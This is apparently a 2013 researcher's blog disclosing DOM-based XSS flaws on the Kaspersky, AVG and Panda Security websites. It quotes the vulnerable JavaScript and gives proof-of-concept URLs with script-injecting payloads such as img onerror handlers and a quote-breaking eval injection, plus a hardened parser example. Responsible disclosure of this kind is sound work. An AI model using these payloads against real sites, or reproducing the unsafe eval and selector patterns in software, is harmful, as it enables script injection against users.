Sunday, January 20, 2013

Kaspersky DOM XSS


Following my study on DOM XSS and antivirus vendors, I found that Kaspersky is also vulnerable to this type of vulnerability.
The problem lies in poor validation of location.hash before it is passed to jQuery (which is also outdated).
/*load current tab by url*/
//if($.url.param("tab")) $('a[name='+$.url.param("tab")+']').trigger('click');
var hash = location.hash;
if (hash.indexOf("tab=") != -1) {
    hash = hash.replace(/^#tab=/, "");
    // location.hash is user-controlled and reaches $() unescaped
    $('a[name=' + hash + ']').trigger('click');
}

If a user loads a URL that carries the "tab" parameter, the code in it will be executed.

Proof of concept:
http://www.kaspersky.com/tablet-security#tab=<img src=x onerror=prompt("xss");>


The Kaspersky team fixed this issue very fast and I would like to thank @assolini from Kaspersky for the support and the gift.

AVG vulnerable to DOM XSS


I discovered a DOM XSS vulnerability in AVG, and it's located in the download section of the official website.

Because the code in the file js_stdfull.js does not escape or encode the URL, a user could inject code into the website.

Vulnerable code:
//display the correct tab based on the url (#name)
var pathname = $(location).attr('href');
var urlparts = pathname.split("#");

Proof of concept:
http://www.avg.com/eu-en/download#"><img src=x onerror=prompt(/xss/);>


This XSS vector worked fine with Chrome, but you could change it to work with other browsers as well.
This issue has already been fixed, but I didn't get any reply from their team.

Thursday, January 10, 2013

Panda Security vulnerable to DOM XSS


Who is Panda?
Panda Security SL, formerly Panda Software, is a computer security company founded in 1990 by Panda's former CEO, Mikel Urizarbarrena, in the city of Bilbao, Spain. Initially centered on the production of antivirus software, the company has expanded its line of applications to include firewall applications, spam and spyware detection applications, cybercrime prevention technology, and other system management and security tools for businesses and home users.

Who uses it?
Panda Security is one of the largest antivirus vendors worldwide, which means lots of clients.

What seems to be the issue?
There is a DOM XSS vulnerability present on the pandasecurity.com website.

Affected file: aHref.js (eval + location.href)

Vulnerable code: 
var Url = location.href;
Url = Url.replace(/.*\?(.*?)/,"$1"); // strip everything up to the last "?"
Variables = Url.split ("&");
for (i = 0; i < Variables.length; i++) {
    Separ = Variables[i].split("=");
    // name and value come straight from the URL and are evaluated as code
    eval ('var _'+Separ[0].toLowerCase()+'="'+Separ[1]+'"');
}
Proof of concept:
http://www.pandasecurity.com/security-promotion/antivirusoffer/portugal/?track=109197";alert("xss by @dsopas");//&gclid=CO7Q3JmqzrQCFUpb3godzC4Ang";alert("xss by @dsopas");//

Both track and gclid are exploitable with this issue.
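
As an added example (not code from this post or from Panda Security), the sketch below shows the string the vulnerable loop builds for eval() from the proof-of-concept URL, next to a replacement parser that keeps the values as plain data. The allow-list of parameter names, the digits-only rule for track, and the function names are assumptions made for the example.

```javascript
// Added example: hardened replacement for the eval-based query parsing above.

// Assumption: only these two parameter names (seen in the PoC URL) are expected.
const ALLOWED_KEYS = new Set(['track', 'gclid']);

// The source text the vulnerable loop passes to eval() for one "key=value"
// pair. It is only returned as a string here, never evaluated.
function evalSourceFor(pair) {
  const separ = pair.split('=');
  return 'var _' + separ[0].toLowerCase() + '="' + separ[1] + '"';
}

// Hardened parser: no eval, no dynamically named variables, values stay data.
function parseQuery(href) {
  const params = Object.create(null);        // no inherited keys to collide with
  const q = href.indexOf('?');
  if (q === -1) return params;
  const query = href.slice(q + 1).split('#')[0];
  for (const pair of query.split('&')) {
    const eq = pair.indexOf('=');
    if (eq === -1) continue;
    const key = pair.slice(0, eq).toLowerCase();
    if (!ALLOWED_KEYS.has(key)) continue;    // unexpected names are dropped
    try {
      params[key] = decodeURIComponent(pair.slice(eq + 1));
    } catch (e) {
      continue;                              // malformed %-escapes are dropped
    }
  }
  return params;
}

// Assumption: a tracking id is digits only, like the "109197" in the PoC.
function isNumericId(value) {
  return /^[0-9]{1,12}$/.test(value);
}

// Sample input: the proof-of-concept URL from the post.
const POC = 'http://www.pandasecurity.com/security-promotion/antivirusoffer/portugal/?track=109197";alert("xss by @dsopas");//&gclid=CO7Q3JmqzrQCFUpb3godzC4Ang";alert("xss by @dsopas");//';

const parsed = parseQuery(POC);
console.log(evalSourceFor(POC.split('?')[1].split('&')[0])); // quote closes early
console.log(parsed.track, isNumericId(parsed.track));        // data only, rejected
```

With the hardened parser the injected text is just the contents of a string, and the format check rejects it before any later code uses it.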

Feedback?
PandaSecurity fixed this issue very fast. My congrats to their support.